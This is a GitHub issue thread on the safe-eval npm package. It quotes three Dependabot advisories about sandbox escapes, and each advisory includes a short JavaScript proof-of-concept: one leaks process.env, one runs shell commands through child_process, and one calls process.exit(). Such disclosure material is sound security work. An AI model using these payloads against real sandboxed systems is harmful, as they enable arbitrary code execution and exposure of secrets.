search

hacksparrow / safe-eval

Safer version of eval()
257 stars 37 forks source link

Sandbox Breakout / Arbitrary Code Execution in safe-eval #24

Closed AspectOfJerry closed 2 years ago

AspectOfJerry commented 2 years ago

I just got 3 Dependabot alerts: I believe it's because I use google-translate-api which is dependent on safe-eval.

Sandbox Breakout / Arbitrary Code Execution in safe-eval (Critical)

Affecting: <= 0.4.1

All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system. No fix is currently available. Consider using an alternative package until a fix is made available.

(function (){
  var ex = new Error
  ex.__proto__ = null
  ex.stack = {
    match: x => {
      return x.constructor.constructor("throw process.env")()
    }
  }
  return ex
})()

prints the contents of process.env.

Sandbox Breakout / Arbitrary Code Execution in safe-eval (High)

Affecting: >= 0.0.0

All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system. No fix is currently available. Consider using an alternative package until a fix is made available.

((() => { 
const targetKey = Object.keys(this)[0]; 
Object.defineProperty(this, targetKey, { 
get: function() { 
return arguments.callee.caller.constructor( 
"return global.process.mainModule.require('child_process').execSync('pwd').toString()" 
)(); 
} 
}); 
})();

may be used to print the pwd to the console.

Sandbox Breakout in safe-eval (Critical)

Affecting: <= 0.3.0 I can fix this one by updating. All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function's callee and caller constructors can escape the sandbox and execute arbitrary code.

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

This code accesses the process object and calls .exit()

rilysh commented 2 years ago

Pretty sure safe-eval is unmaintained now

AspectOfJerry commented 2 years ago

It's fine I don't use it anymore.

UniqueName12345 commented 2 years ago

Pretty sure safe-eval is unmaintained now

Why?

AspectOfJerry commented 2 years ago

It's been 4 years since the last commit and the repo doesn't look super alive.

Why?

I don't know 🤷🏼.